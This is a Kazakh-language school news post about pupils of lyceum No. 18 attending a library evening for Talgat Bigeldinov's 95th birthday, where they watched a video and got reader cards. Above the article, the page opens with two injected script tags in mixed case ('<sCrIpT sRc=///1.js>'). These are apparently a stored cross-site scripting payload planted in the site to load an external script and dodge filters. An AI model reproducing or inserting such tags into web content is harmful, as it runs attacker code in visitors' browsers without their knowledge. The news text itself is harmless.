<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

07.09.2017

С. Жүнісов атындағы №18 ОМЛ М.Жұмабаев атындағы АОӘҒК  2017 жылдың  6  қыркүйегінде қазақ халқының ХХ ғасырдағы қаһармандығының үлгісі ,тұтас бір ерлік дәуірінің белгісіндей болған Талғат Бигелдиновтың туғанына 95  жыл толуына орай өткен "...Ол Отанына  өз өмірін арнады" атты тақырыптық кешке  № 18 орта  мектеп- лицейінің 7"Ә" сынып оқушыларын ,Нұрмұқанова Жұмагүл Жабенқызы  оларды бастап алып барды. Жас ұрпақтың ой-санасы мен жүрегінде патриоттық сезімдерін ояту , Отанға , Туған жерге деген сүйіспеншіліктерін арттыру мақсатында өткен іс-шара нәтижелі де  мағыналы болды. Екі мәрте Кеңес Одағыны Батыры Т.Ж.Бигелдинов туралы қызықты бейнебаян көріп , қойылған  сұрақтарға ойлана жауап беріп , білмегендерін сұрап ,бірін-бірі толықтырып отырды. Сонымен қатар, оқушылар кітапхана ішіне саяхат жасап , болашақта керек екенін біліп, оқырмандық билеттерін де алып шықты. Шетел әдебиеті бөлімінде  "Бір ел , бір кітап " атты жылдық іс-шараның биылғы тақырыбы С.Торайғыров екенін білді. Оқушыларға осындай тақырыптық кештерге қатысып отырса,  ой- санасы  толығып ,білім жиегі кеңейіп отырары шексіз деп ойлаймын.

Просмотров: 762


Пікір қосу



Деректерді қолтаңбаға қосу